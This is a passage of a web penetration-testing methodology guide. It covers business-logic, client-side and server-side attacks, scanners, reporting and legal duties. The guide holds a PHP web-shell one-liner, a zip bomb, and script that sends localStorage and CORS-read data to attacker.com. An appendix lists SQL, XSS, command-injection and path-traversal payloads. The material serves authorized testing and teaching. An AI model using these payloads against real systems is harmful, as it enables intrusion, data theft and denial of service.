echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip malicious.zip shell.php
# Modify zip to include path traversal in filename:
# Use zip tool to add ../../../../var/www/html/shell.php

ZIP bomb (DoS):

# Create zip bomb
dd if=/dev/zero bs=1M count=10240 | gzip > 10GB.gz
# 10MB compressed, 10GB uncompressed

# Upload to cause DoS when extracted
curl -F "file=@10GB.gz" http://target.com/upload

---

Business Logic Testing

Price Manipulation

# Negative quantity
curl -X POST http://target.com/cart/add \
    -d "product_id=123&quantity=-1&price=99.99"

# Negative price
curl -X POST http://target.com/checkout \
    -d "items[0][id]=123&items[0][quantity]=1&items[0][price]=-99.99"

# Currency mismatch
curl -X POST http://target.com/checkout \
    -d "amount=1&currency=USD"
# Then change currency to IDR (1 USD = 15,000 IDR)
curl -X POST http://target.com/process-payment \
    -d "amount=1&currency=IDR"

# Decimal truncation
curl -X POST http://target.com/cart/add \
    -d "product_id=123&price=0.001"
# If stored as integer: 0.001 → 0

Race Conditions

Testing race conditions:

# Scenario: Redeem coupon code (single-use)

# 1. Create multiple requests in parallel
for i in {1..10}; do
    curl -X POST http://target.com/redeem \
        -H "Cookie: session=user_session" \
        -d "coupon=SAVE50" &
done

# Expected: Only 1 successful redemption
# Vulnerable: Multiple successful redemptions

# Turbo Intruder (Burp Suite extension)
# 1. Send request to Turbo Intruder
# 2. Set concurrency to 50-100
# 3. Send simultaneous requests

Real-world race condition examples:

# Double spending (crypto/payment)
# Send 2 simultaneous withdrawal requests before balance check

# Duplicate voucher usage
# Redeem same code multiple times in parallel

# Inventory overflow
# Purchase item with quantity=999999 before stock validation

Workflow Bypass

# Normal checkout flow:
# 1. Add to cart → 2. Shipping info → 3. Payment → 4. Confirmation

# Bypass payment step:
# Skip directly from step 2 to step 4
curl -X POST http://target.com/checkout/confirm \
    -H "Cookie: session=user_session" \
    -d "order_id=12345"

# Multi-step form bypass
# Step 1: /register/step1 (email)
# Step 2: /register/step2 (profile)
# Step 3: /register/step3 (verification)

# Skip to step 3 without completing step 2:
curl -X POST http://target.com/register/step3 \
    -d "email=test@example.com&verified=true"

Account Takeover via Logic Flaws

# Password reset token reuse
# 1. Request password reset for victim
# 2. Victim receives token
# 3. Attacker requests reset for same email
# 4. Attacker uses victim's old token (if not invalidated)

# OAuth redirect_uri manipulation
curl "http://target.com/oauth/authorize?client_id=123&redirect_uri=http://attacker.com&response_type=code"

# Email verification bypass
# Register with victim@example.com
# Change email to attacker@evil.com before verification
# Click verification link → attacker@evil.com is verified

---

Client-Side Security

Local Storage Security

// Check for sensitive data in localStorage
console.log(localStorage);

// Common sensitive data found:
// - JWT tokens
// - Session IDs
// - API keys
// - PII (personally identifiable information)

// Exploit:
// XSS → steal localStorage:
<script>
fetch('http://attacker.com/steal?data=' + btoa(JSON.stringify(localStorage)));
</script>

WebSocket Security

// Test WebSocket endpoint
var ws = new WebSocket('ws://target.com/chat');

ws.onopen = function() {
    // Send malicious message
    ws.send('{"type":"admin","command":"delete_all_users"}');
};

ws.onmessage = function(event) {
    console.log('Received:', event.data);
};

// Check for authentication
// Vulnerable: WebSocket accepts connections without auth token

// Check for message validation
// Send unexpected message types, XSS payloads, injection attempts

PostMessage Security

// Vulnerable postMessage listener:
window.addEventListener('message', function(event) {
    // No origin validation!
    document.getElementById('output').innerHTML = event.data;  // XSS!
});

// Exploit from attacker.com:
<iframe src="http://target.com/vulnerable-page"></iframe>
<script>
frames[0].postMessage('<img src=x onerror=alert(1)>', '*');
</script>

// Secure implementation:
window.addEventListener('message', function(event) {
    // Validate origin
    if (event.origin !== 'https://trusted-site.com') {
        return;
    }
    // Sanitize data
    document.getElementById('output').textContent = event.data;
});

CORS Misconfiguration

# Test for wildcard CORS
curl -H "Origin: http://attacker.com" \
     -H "Access-Control-Request-Method: POST" \
     -H "Access-Control-Request-Headers: X-Requested-With" \
     -X OPTIONS \
     http://target.com/api/data

# Vulnerable response:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true

# Exploitation:
<script>
fetch('http://target.com/api/sensitive-data', {
    credentials: 'include'
})
.then(r => r.text())
.then(data => {
    fetch('http://attacker.com/steal?data=' + btoa(data));
});
</script>

# Test for origin reflection
curl -H "Origin: http://evil.com" http://target.com/api/data

# Vulnerable response:
# Access-Control-Allow-Origin: http://evil.com  (reflects any origin)

Client-Side Prototype Pollution

Concept: untrusted input merges into Object.prototype, polluting every object in the JS runtime. Combined with a gadget (a property the app reads from a fresh object), pollution becomes XSS, auth bypass, or DoS.

Detection — quick checks in DevTools:

// 1. Sources: query string, hash, postMessage, JSON body merged via lodash.merge / $.extend(true,…) / Object.assign-recursively
// 2. Set a canary via URL:
//    https://target.com/?__proto__[polluted]=yes
//    https://target.com/#__proto__.polluted=yes
// 3. In console:
({}).polluted        // → "yes" if vulnerable
Object.prototype.polluted  // → "yes"

Common DOM gadgets that turn pollution into XSS:

// jQuery <= 3.4 — innerHTML sink reachable via polluted .innerHTML default
// Bootstrap 4 — pollute __proto__.template to inject HTML in tooltips/popovers
// Chart.js / Highcharts — polluted defaults inject script via SVG
// Pollute then trigger:
//   ?__proto__[src]=data:,alert(1)//  (script loader gadget)
//   #__proto__[innerHTML]=<img src=x onerror=alert(1)>

Tooling:

• PPScan / DOM-Invader (Burp Suite) — DOM-Invader has a built-in prototype-pollution scanner; enable in Burp browser → DOM Invader → Settings.
• ppmap — bookmarklet/extension that probes a page for known gadgets.
• Server-Side Prototype Pollution (SSPP): same primitive against Node.js back-ends. Detect via differential responses on JSON parsers (Express's app.use(express.json()) is not directly vulnerable; merge libraries are). PortSwigger's research on detecting SSPP via __proto__ and constructor.prototype injection is the canonical reference.

Remediation cross-link: patched merge implementations (lodash >= 4.17.21, jQuery >= 3.5), Object.freeze(Object.prototype), Map/Set instead of plain objects for untrusted-key storage, --disable-proto=throw Node flag.

---

Server-Side Security

HTTP Security Headers

Check security headers:

curl -I http://target.com

# Essential security headers:
# ✅ Strict-Transport-Security: max-age=31536000; includeSubDomains
# ✅ X-Frame-Options: DENY                                   (legacy; superseded by CSP `frame-ancestors`, but ship both for defense-in-depth)
# ✅ X-Content-Type-Options: nosniff
# ✅ Content-Security-Policy: default-src 'self'             (CSP3 recommended; nonces/hashes preferred over 'unsafe-inline')
# ⚠️ X-XSS-Protection: 0                                     (DEPRECATED — Chrome/Edge XSS auditor removed in M78; Firefox never shipped one; explicit `0` disables remaining quirks. Do NOT ship `1; mode=block` on new apps — rely on CSP.)
# ✅ Referrer-Policy: strict-origin-when-cross-origin        (modern default; "no-referrer" only if telemetry isn't needed)
# ✅ Permissions-Policy: geolocation=(), microphone=(), camera=()
# ✅ Cross-Origin-Opener-Policy: same-origin                 (mitigates Spectre/XS-Leaks; required for crossOriginIsolated)
# ✅ Cross-Origin-Embedder-Policy: require-corp
# ✅ Cross-Origin-Resource-Policy: same-origin               (per-resource opt-in; pairs with COOP/COEP)

Missing header implications:

# Missing HSTS → SSL stripping attacks possible
# Missing X-Frame-Options → Clickjacking possible
# Missing CSP → XSS attacks easier
# Missing X-Content-Type-Options → MIME confusion attacks

Server Information Disclosure

# Server version disclosure
curl -I http://target.com | grep "Server:"
# Apache/2.4.29 (Ubuntu)  ← Discloses OS and version

# PHP version disclosure
curl -I http://target.com | grep "X-Powered-By:"
# X-Powered-By: PHP/7.2.24  ← Discloses PHP version

# Technology stack leakage
whatweb http://target.com

# Error message information disclosure
curl http://target.com/nonexistent.php
# Fatal error: require_once(): Failed opening required '/var/www/html/config.php'
# ← Discloses absolute path

HTTP Method Testing

# Test for dangerous HTTP methods
curl -X OPTIONS http://target.com -v

# Check Allow header:
# Allow: GET, POST, PUT, DELETE, OPTIONS, TRACE  ← TRACE is dangerous

# Test TRACE (XST - Cross-Site Tracing)
curl -X TRACE http://target.com -H "Cookie: session=secret"
# If TRACE is enabled, response includes cookie

# Test PUT (arbitrary file upload)
curl -X PUT http://target.com/shell.php -d '<?php system($_GET["cmd"]); ?>'

# Test DELETE
curl -X DELETE http://target.com/important-file.php

SSL/TLS Vulnerabilities

# testssl.sh comprehensive scan
testssl.sh --full https://target.com

# Check for specific vulnerabilities:
# - Heartbleed (CVE-2014-0160)
testssl.sh --heartbleed https://target.com

# - POODLE (CVE-2014-3566)
testssl.sh --poodle https://target.com

# - BEAST (CVE-2011-3389)
testssl.sh --beast https://target.com

# - CRIME (CVE-2012-4929)
testssl.sh --crime https://target.com

# - Weak ciphers
nmap --script ssl-enum-ciphers -p 443 target.com | grep -E "weak|broken"

HTTP Request Smuggling (HRS / Desync)

Concept: front-end proxy and back-end server disagree on where one HTTP request ends and the next begins, letting an attacker prepend bytes to the next user's request. PortSwigger's "HTTP Desync Attacks" research (2019, expanded 2022 with browser-powered desync, expanded 2024 with HTTP/2-to-HTTP/1.1 downgrade smuggling) is the canonical reference.

Variants to test:

# CL.TE — front-end uses Content-Length, back-end uses Transfer-Encoding
POST / HTTP/1.1
Host: target.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

# TE.CL — front-end uses TE, back-end uses CL
POST / HTTP/1.1
Host: target.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0


# TE.TE — both honor TE, but obfuscated header bypasses one (Transfer-Encoding\x0bxchunked, Transfer-encoding: x, etc.)

# H2.CL / H2.TE — HTTP/2 front-end downgraded to HTTP/1.1 back-end; smuggle via :method/:path injection
# (relevant when Cloudflare/AWS ALB/Nginx terminate HTTP/2 then re-issue HTTP/1.1).

Detection workflow (Burp Suite):

1. Install HTTP Request Smuggler (James Kettle, PortSwigger) extension.
2. Right-click target → Extensions → HTTP Request Smuggler → Smuggle probe (or Smuggle scan).
3. Review Issues for confirmed CL.TE / TE.CL / H2.* desync.
4. Manual confirmation via timing differences: a malformed request that the back-end queues should add ~5s to the next victim request (-X TIME_BASED mode in the extension).

Impact:

• Bypass front-end auth / WAF (smuggled request is interpreted as already-authenticated context).
• Cache poisoning (next user gets attacker's response).
• Credential capture (smuggle a request that prefixes the victim's request line, then read their headers).
• Internal-host pivoting via Host-header smuggling.

Mitigation cross-link: ensure front-end and back-end agree on framing (HTTP/2 end-to-end, drop ambiguous TE/CL combinations, reject conflicting headers per RFC 7230 §3.3.3).

Web Cache Poisoning & Cache Deception

Cache Poisoning (PortSwigger 2018; expanded 2020 / 2024): unkeyed input (a header or query param the cache ignores when computing the cache key) influences the cached response, so the next user gets attacker-controlled content.

# 1. Identify caching: send the same request twice, check `Age:` / `X-Cache: HIT` / `CF-Cache-Status: HIT` / `Via:` headers.
# 2. Identify unkeyed inputs: Burp Param Miner (James Kettle) extension → "Guess headers" / "Guess params".
# 3. Reflect a header into the response, confirm it persists across cache key collisions:
curl -H "X-Forwarded-Host: evil.com" https://target.com/path
# If the reflected `<link rel=canonical href="https://evil.com/...">` (or similar) ends up in the cached response,
# next victim hitting /path receives attacker-controlled HTML.

Common unkeyed gadgets: X-Forwarded-Host, X-Forwarded-Scheme, X-Original-URL, X-Rewrite-URL, X-Host, Forwarded, User-Agent (per-segment), cookies on Vary-less responses.

Cache Deception (Omer Gil, 2017): attacker convinces the cache that a sensitive dynamic response is a static asset.

# Victim is logged in. Attacker sends victim a link to:
https://target.com/profile/avatar.jpg
# If the back-end serves /profile (ignoring the suffix) and the cache caches based on
# "*.jpg" suffix, the cache stores the victim's authenticated profile under that URL.
# Attacker re-fetches the same URL unauthenticated and reads PII.

# Variants:
/profile/avatar.css
/profile/avatar.png
/profile;.jpg          # path-parameter trick on Java servlet stacks
/profile%2fimage.jpg   # encoded slash
/profile/..%2favatar.jpg

Tooling: Burp Suite Param Miner, Web Cache Vulnerability Scanner (wcvs — github.com/Hackmanit/Web-Cache-Vulnerability-Scanner) [verify 2026-04-25].

Mitigation cross-link: key the cache on every header/param the back-end consumes (or strip them at the edge); never serve dynamic content under static-looking paths; use Cache-Control: private, no-store on authenticated routes.

---

Automated Scanning

Nuclei (Template-Based Scanner)

# Install Nuclei templates
nuclei -update-templates

# Full vulnerability scan
nuclei -u http://target.com

# Scan with specific severity
nuclei -u http://target.com -severity critical,high

# CVE scanning
nuclei -u http://target.com -t ~/nuclei-templates/cves/

# Technology-specific templates
nuclei -u http://target.com -t ~/nuclei-templates/technologies/wordpress/
nuclei -u http://target.com -t ~/nuclei-templates/technologies/joomla/

# XSS templates
nuclei -u http://target.com -t ~/nuclei-templates/vulnerabilities/xss/

# SQL injection templates
nuclei -u http://target.com -t ~/nuclei-templates/vulnerabilities/sqli/

# Subdomain scanning
subfinder -d target.com | nuclei -t ~/nuclei-templates/

Burp Suite Scanner (Professional)

# Automated scanning workflow:
# 1. Spider/Crawl the application
# 2. Passive scanner (analyzes traffic)
# 3. Active scanner (sends payloads)

# Launch scan:
# Target → Right-click → Scan

# Scan configuration:
# - Crawl and Audit
# - Audit only (if already crawled)
# - Custom scan (select specific checks)

OWASP ZAP (Zed Attack Proxy)

# Automated scan
zap.sh -cmd -quickurl http://target.com -quickout zap_report.html

# API scan
zap.sh -cmd -openapiurl http://target.com/swagger.json -quickout api_report.html

# Full scan with authentication
zap-cli quick-scan --self-contained --spider -r http://target.com

# ZAP as proxy (manual testing)
zap.sh -port 8090
# Configure browser to use 127.0.0.1:8090 as proxy

Nikto (Web Server Scanner)

# Basic scan
nikto -h http://target.com

# Scan with all plugins
nikto -h http://target.com -Plugins @@ALL

# Save results
nikto -h http://target.com -o nikto_report.html -Format html

# Scan through proxy
nikto -h http://target.com -useproxy http://127.0.0.1:8080

WPScan (WordPress Scanner)

# Basic WordPress scan
wpscan --url http://target.com

# Enumerate vulnerable plugins
wpscan --url http://target.com --enumerate vp

# Enumerate vulnerable themes
wpscan --url http://target.com --enumerate vt

# Enumerate users
wpscan --url http://target.com --enumerate u

# Password brute-force
wpscan --url http://target.com --usernames admin --passwords /usr/share/wordlists/rockyou.txt

# Full enumeration with API token
wpscan --url http://target.com --enumerate vp,vt,u --api-token YOUR_API_TOKEN

---

Reporting & Remediation

Vulnerability Report Structure

Executive Summary:

• Brief overview of engagement
• Critical findings summary
• Risk rating (Critical, High, Medium, Low)
• Remediation timeline recommendations

Methodology:

• Scope and limitations
• Testing approach (black-box, gray-box, white-box)
• Tools used
• Testing timeline

Findings:

For each vulnerability:

1. Title: SQL Injection in Login Form
2. Severity: Critical (CVSS 9.8)
3. Affected Component: /api/login endpoint, username parameter
4. Description: The login endpoint is vulnerable to SQL injection due to unsanitized user input being directly concatenated into SQL queries.
5. Proof of Concept:

   curl -X POST http://target.com/api/login \
       -d "username=admin' OR '1'='1&password=anything"

6. Impact:
   • Complete database compromise
   • Extraction of user credentials
   • Potential remote code execution
7. Remediation:
   • Use parameterized queries (prepared statements)
   • Implement input validation
   • Apply least privilege principle for database user
8. References:
   • OWASP Top 10 2021: A03 - Injection
   • CWE-89: SQL Injection

CVSS Scoring

Common Vulnerability Scoring System calculator:

https://www.first.org/cvss/calculator/3.1

Example scoring:

• SQL Injection: CVSS 9.8 (Critical)

  • Attack Vector: Network (AV:N)
  • Attack Complexity: Low (AC:L)
  • Privileges Required: None (PR:N)
  • User Interaction: None (UI:N)
  • Confidentiality: High (C:H)
  • Integrity: High (I:H)
  • Availability: High (A:H)

• Stored XSS: CVSS 7.1 (High)

  • Attack Vector: Network (AV:N)
  • Privileges Required: Low (PR:L)
  • User Interaction: Required (UI:R)
  • Confidentiality: High (C:H)

Remediation Recommendations

SQL Injection:

// Vulnerable code:
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";

// Secure code (parameterized query):
$stmt = $pdo->prepare("SELECT * FROM users WHERE username = :username");
$stmt->execute(['username' => $_POST['username']]);

XSS:

// Vulnerable code:
echo "<div>" . $_GET['search'] . "</div>";

// Secure code (HTML encoding):
echo "<div>" . htmlspecialchars($_GET['search'], ENT_QUOTES, 'UTF-8') . "</div>";

CSRF:

// Generate CSRF token:
session_start();
if (empty($_SESSION['csrf_token'])) {
    $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
}

// Include in form:
echo '<input type="hidden" name="csrf_token" value="' . $_SESSION['csrf_token'] . '">';

// Validate on submission:
if ($_POST['csrf_token'] !== $_SESSION['csrf_token']) {
    die('CSRF token validation failed');
}

---

Tools Reference

Essential Tools

Tool	Purpose	Installation
Burp Suite Community	HTTP proxy, manual repeater/intruder	sudo apt install burpsuite (Community Edition; Pro/Enterprise are paid downloads from portswigger.net)
ZAP (Zed Attack Proxy)	HTTP proxy, automated scanner	sudo apt install zaproxy (project moved from OWASP to the Software Security Project in 2024)
sqlmap	Automated SQL injection	git clone https://github.com/sqlmapproject/sqlmap.git (apt build lags upstream)
Nmap	Port scanner, service detection	sudo apt install nmap
Nikto	Web server scanner	sudo apt install nikto (low signal:noise; modernise with Nuclei)
ffuf	Web fuzzer, directory brute-force	go install github.com/ffuf/ffuf/v2@latest
Nuclei	Template-based vulnerability scanner	go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest (v3.x is current; templates: nuclei -update-templates)
subfinder	Subdomain enumeration	go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
httpx	Probe live HTTP/HTTPS endpoints + tech detect	go install github.com/projectdiscovery/httpx/cmd/httpx@latest (preferred over the older httprobe)
katana	JS-aware crawler (SPA, headless)	go install github.com/projectdiscovery/katana/cmd/katana@latest
dalfox	XSS scanner	go install github.com/hahwul/dalfox/v2@latest

Specialized Tools

Tool	Purpose	Website
WPScan	WordPress scanner (API token required for vuln data)	https://wpscan.com/
Droopescan	Drupal/Joomla/SilverStripe scanner	https://github.com/SamJoan/droopescan
Retire.js	JavaScript library vulnerability scanner	https://retirejs.github.io/retire.js/
jwt_tool	JWT analysis and exploitation (alg confusion, JWKS spoof, kid traversal)	https://github.com/ticarpi/jwt_tool
testssl.sh	SSL/TLS testing	https://testssl.sh/
Arjun	HTTP parameter discovery	https://github.com/s0md3v/Arjun
LinkFinder	Endpoint discovery in JavaScript	https://github.com/GerbenJavado/LinkFinder
XSStrike	Advanced XSS detection	https://github.com/s0md3v/XSStrike (intermittently maintained — prefer dalfox or DOM-Invader for new work)
Burp Suite — HTTP Request Smuggler	Desync attack scanner	https://github.com/PortSwigger/http-request-smuggler
Burp Suite — Param Miner	Cache-key / unkeyed-input discovery	https://github.com/PortSwigger/param-miner
Burp Suite — DOM Invader	Built-in client-side prototype-pollution + DOM XSS scanner	Bundled with Burp 2022.6+ (Burp browser → DOM Invader)
Burp Suite — JWT Editor / SAML Raider	In-flight JWT/SAML manipulation	https://github.com/PortSwigger/jwt-editor / https://github.com/CompassSecurity/SAMLRaider
Caido	Modern Burp alternative (Rust-based proxy)	https://caido.io/ [verify 2026-04-25]
wcvs	Web Cache Vulnerability Scanner	https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
kiterunner	API-aware fuzzer (consumes Swagger/Postman)	https://github.com/assetnote/kiterunner
gf + tomnomnom patterns	Grep-based vuln pattern matching across recon output	https://github.com/tomnomnom/gf

Browser Extensions

Extension	Purpose	Browser
FoxyProxy	Proxy switching	Firefox, Chrome
Wappalyzer	Technology detection	Firefox, Chrome
Cookie-Editor	Cookie manipulation	Firefox, Chrome
User-Agent Switcher	UA spoofing	Firefox, Chrome
EditThisCookie	Cookie editing	Chrome

---

Legal & Ethical Considerations

Canonical reference: Legal & Ethics SOP is the authoritative source for jurisdiction-specific legal frameworks, evidence-handling, and disclosure obligations. The summary below is a quick reference for the engagement-specific items most often missed in web pentests; defer to the canonical SOP for any cross-border, regulated-data, or law-enforcement-adjacent decision. For OPSEC during testing (proxy chains, attribution hygiene, log scrubbing) see OPSEC Plan SOP.

Authorization Requirements

CRITICAL: Never test without explicit written authorization

Required documentation:

1. Scope of Work (SOW) - Defines testing boundaries
2. Rules of Engagement (ROE) - Specifies allowed/prohibited actions
3. Non-Disclosure Agreement (NDA) - Protects sensitive information
4. Testing Authorization Letter - Written permission from asset owner

Example authorization clause:

[Company Name] hereby authorizes [Tester Name/Organization] to perform
security testing on the following systems:

Scope:
- https://app.example.com
- https://api.example.com
- 192.168.1.0/24 (internal network)

Out of Scope:
- https://www.example.com (production marketing site)
- Third-party services (AWS, payment gateways)

Allowed Actions:
- Vulnerability scanning
- Manual penetration testing
- Authenticated testing with provided credentials

Prohibited Actions:
- Denial of Service (DoS) attacks
- Social engineering
- Physical security testing

Duration: January 1, 2025 - January 31, 2025

Authorized by: [Name, Title, Signature, Date]

Legal Frameworks

United States:

• Computer Fraud and Abuse Act (CFAA) - 18 U.S.C. § 1030
  • Unauthorized access is illegal
  • Exceeding authorized access is illegal
• Stored Communications Act (SCA) - 18 U.S.C. § 2701

European Union:

• GDPR (General Data Protection Regulation)
  • Protect personal data discovered during testing
  • Minimize data exposure
  • Report data breaches within 72 hours

United Kingdom:

• Computer Misuse Act 1990
  • Unauthorized access to computer material (Section 1)
  • Unauthorized modification of computer material (Section 3)

Responsible Disclosure

Standard disclosure timeline:

1. Day 0: Discover vulnerability
2. Day 1-7: Privately report to vendor
3. Day 7-90: Vendor investigates and develops fix
4. Day 90: Public disclosure (or earlier if agreed)

Reporting channels:

# Security.txt (RFC 9116)
curl https://target.com/.well-known/security.txt

# Example security.txt:
# Contact: security@example.com
# Expires: 2025-12-31T23:59:59.000Z
# Preferred-Languages: en
# Policy: https://example.com/security-policy

Bug bounty platforms:

• HackerOne: https://www.hackerone.com/
• Bugcrowd: https://www.bugcrowd.com/
• Intigriti: https://www.intigriti.com/
• YesWeHack: https://www.yeswehack.com/

Data Handling

Protect discovered sensitive data:

# ❌ DO NOT:
# - Download user databases
# - Share passwords/credentials
# - Access other users' data beyond PoC
# - Screenshot PII (personally identifiable information)

# ✅ DO:
# - Use test accounts when possible
# - Redact sensitive data in reports
# - Use placeholders: "user@[REDACTED].com"
# - Encrypt evidence files

Evidence encryption:

# Encrypt report with GPG
gpg --encrypt --recipient security@vendor.com pentest_report.pdf

# Encrypt evidence archive
7z a -p -mhe=on evidence.7z screenshots/ logs/
# -p: password protection
# -mhe=on: encrypt filenames

---

Related SOPs

Analysis:

• Reverse Engineering - Binary web service analysis and exploitation
• Cryptography Analysis - JWT analysis, crypto failures, session security
• Malware Analysis - Web shell and malicious script analysis

Pentesting & Security:

• Linux Pentesting - Server-side exploitation and privilege escalation
• Active Directory Pentesting - Web apps with AD/SSO integration
• Mobile Security - Mobile API security testing
• Vulnerability Research - Finding web application vulnerabilities
• Bug Bounty Hunting - Responsible web vulnerability disclosure
• Firmware Reverse Engineering - IoT web interfaces and embedded device testing
• Detection Evasion Testing - Bypassing WAF and security controls
• Forensics Investigation - Web compromise investigation

---

Appendix: Common Payloads

SQL Injection Payloads

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'/*
admin'--
admin'#
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
1' AND SLEEP(5)--
1' AND BENCHMARK(5000000,MD5('A'))--

XSS Payloads

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>
<body onload=alert(1)>
<iframe src="javascript:alert(1)">
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
javascript:alert(1)

Command Injection Payloads

; whoami
| whoami
|| whoami
& whoami
&& whoami
`whoami`
$(whoami)
; cat /etc/passwd
| cat /etc/passwd

Path Traversal Payloads

../../../etc/passwd
..%2f..%2f..%2fetc%2fpasswd
....//....//....//etc/passwd
..;/..;/..;/etc/passwd

---

Reference Resources

Comprehensive Knowledge Bases

• OWASP Web Security Testing Guide (WSTG) - owasp.org/www-project-web-security-testing-guide

  • Definitive web application security testing methodology
  • Covers all OWASP Top 10 vulnerabilities in depth
  • Testing techniques, checklists, and remediation guidance

• HackTricks - Web Vulnerabilities - book.hacktricks.xyz/pentesting-web

  • Comprehensive web pentesting techniques
  • Covers SQLi, XSS, CSRF, XXE, SSRF, and more
  • Bypass techniques and exploitation payloads

• PortSwigger Web Security Academy - portswigger.net/web-security

  • Free interactive web security training
  • Hands-on labs for all major vulnerability types
  • Created by Burp Suite developers

• PayloadsAllTheThings - github.com/swisskyrepo/PayloadsAllTheThings

  • Massive collection of web exploitation payloads
  • SQLi, XSS, XXE, SSTI, command injection, and more
  • Bypass techniques and cheat sheets

OWASP Resources

• OWASP Top 10 - owasp.org/www-project-top-ten

  • Most critical web application security risks
  • 2025 release published at owasp.org/Top10/2025/; 2021 release retained at owasp.org/Top10/ for legacy mapping

• OWASP Cheat Sheet Series - cheatsheetseries.owasp.org

  • Secure coding practices for developers
  • Input validation, authentication, session management, cryptography

• OWASP API Security Top 10 - owasp.org/www-project-api-security

  • API-specific vulnerabilities and mitigation

• OWASP Juice Shop - owasp.org/www-project-juice-shop

  • Intentionally vulnerable web application for practice
  • Covers OWASP Top 10 and modern web vulnerabilities

Injection Attack Resources

• sqlmap Documentation - sqlmap.org

  • Automated SQL injection exploitation
  • Database extraction, OS command execution

• SQL Injection Cheat Sheet - portswigger.net/web-security/sql-injection/cheat-sheet

  • Database-specific SQLi payloads (MySQL, PostgreSQL, MSSQL, Oracle)

• NoSQL Injection - book.hacktricks.xyz/pentesting-web/nosql-injection

  • MongoDB, CouchDB, Redis injection techniques

• Command Injection - book.hacktricks.xyz/pentesting-web/command-injection

  • OS command injection payloads and bypass techniques

XSS & Client-Side Attack Resources

• PortSwigger XSS Cheat Sheet - portswigger.net/web-security/cross-site-scripting/cheat-sheet

  • Browser-specific XSS vectors
  • Filter bypass techniques

• XSS Filter Evasion Cheat Sheet - owasp.org/www-community/xss-filter-evasion-cheatsheet

  • WAF and filter bypass payloads

• Browser Exploitation Framework (BeEF) - beefproject.com

  • Browser exploitation framework for XSS post-exploitation

• DOMPurify - github.com/cure53/DOMPurify

  • XSS sanitizer (useful for understanding XSS defenses)

API Security Resources

• API Security Best Practices - apisecurity.io

  • API security news, vulnerabilities, best practices

• GraphQL Security - howtographql.com/advanced/4-security

  • GraphQL-specific vulnerabilities and mitigation

• Postman Learning Center - learning.postman.com/docs/sending-requests/authorization

  • API authentication and testing with Postman

• REST API Security Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/REST_Security_Cheat_Sheet.html

Authentication & Session Management

• JWT.io - jwt.io

  • JWT decoder and debugger
  • Library implementations for all languages

• jwt_tool - github.com/ticarpi/jwt_tool

  • JWT security testing toolkit

• OWASP Session Management Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html

• Authentication Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Authentication_Cheat_Sheet.html

File Upload & XXE Resources

• File Upload Vulnerabilities - book.hacktricks.xyz/pentesting-web/file-upload

  • Bypass techniques, magic byte manipulation, path traversal

• XXE (XML External Entity) - portswigger.net/web-security/xxe

  • XXE exploitation techniques and payloads

• OWASP File Upload Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/File_Upload_Cheat_Sheet.html

SSRF & CSRF Resources

• SSRF Bible - github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

  • SSRF payloads, cloud metadata exploitation, bypass techniques

• CSRF Cheat Sheet - cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html

• Burp Collaborator - portswigger.net/burp/documentation/collaborator

  • Out-of-band interaction detection for SSRF, XXE, blind injection

Access Control & IDOR Resources

• IDOR Guide - book.hacktricks.xyz/pentesting-web/idor

  • Insecure Direct Object Reference testing methodology

• Authorization Testing Guide - owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/05-Authorization_Testing/README

• Broken Access Control - portswigger.net/web-security/access-control

Business Logic & Race Condition Resources

• Business Logic Vulnerabilities - portswigger.net/web-security/logic-flaws

  • Price manipulation, workflow bypass, race conditions

• Race Condition Exploitation - portswigger.net/research/smashing-the-state-machine

  • Turbo Intruder for race condition testing

• OWASP Testing for Business Logic - owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/10-Business_Logic_Testing/README

Subdomain Enumeration & Reconnaissance

• Subdomain Enumeration Guide - github.com/appsecco/the-art-of-subdomain-enumeration

  • Comprehensive subdomain discovery techniques

• Certificate Transparency Logs - crt.sh

  • Search for SSL certificates to find subdomains

• Shodan - shodan.io

  • Search engine for internet-connected devices
  • Find exposed services and vulnerabilities

• Censys - censys.io

  • Internet-wide asset discovery

Vulnerability Databases & CVE Resources

• National Vulnerability Database (NVD) - nvd.nist.gov

  • Official CVE database with CVSS scores

• Exploit Database - exploit-db.com

  • Public exploits and vulnerable software

• Packet Storm - packetstormsecurity.com

  • Security tools, exploits, advisories

• VulnHub - vulnhub.com

  • Vulnerable VMs for practice

CMS-Specific Security Resources

• WPScan Vulnerability Database - wpscan.com/wordpresses

  • WordPress core, plugin, and theme vulnerabilities

• WordPress Security - wordpress.org/support/article/hardening-wordpress

  • Official WordPress hardening guide

• Joomla Security Checklist - docs.joomla.org/Security_Checklist

• Drupal Security Team - drupal.org/security

SSL/TLS & Cryptography Testing

• SSL Labs Server Test - ssllabs.com/ssltest

  • Online SSL/TLS configuration testing

• testssl.sh Documentation - testssl.sh

  • SSL/TLS vulnerability scanner

• TLS Cipher Suite Recommendations - ssl-config.mozilla.org

  • Mozilla SSL configuration generator

Web Application Firewalls (WAF) & Bypass Techniques

• WAF Bypass Techniques - github.com/0xInfection/Awesome-WAF

  • WAF fingerprinting and bypass methods

• CloudFlare Bypass - book.hacktricks.xyz/network-services-pentesting/pentesting-web/uncovering-cloudflare

Bug Bounty Platforms & Programs

• HackerOne - hackerone.com/directory/programs

  • Public bug bounty programs

• Bugcrowd - bugcrowd.com/programs

  • Bug bounty and vulnerability disclosure programs

• Intigriti - intigriti.com/programs

  • European bug bounty platform

• YesWeHack - yeswehack.com/programs

Practice Labs & CTF Platforms
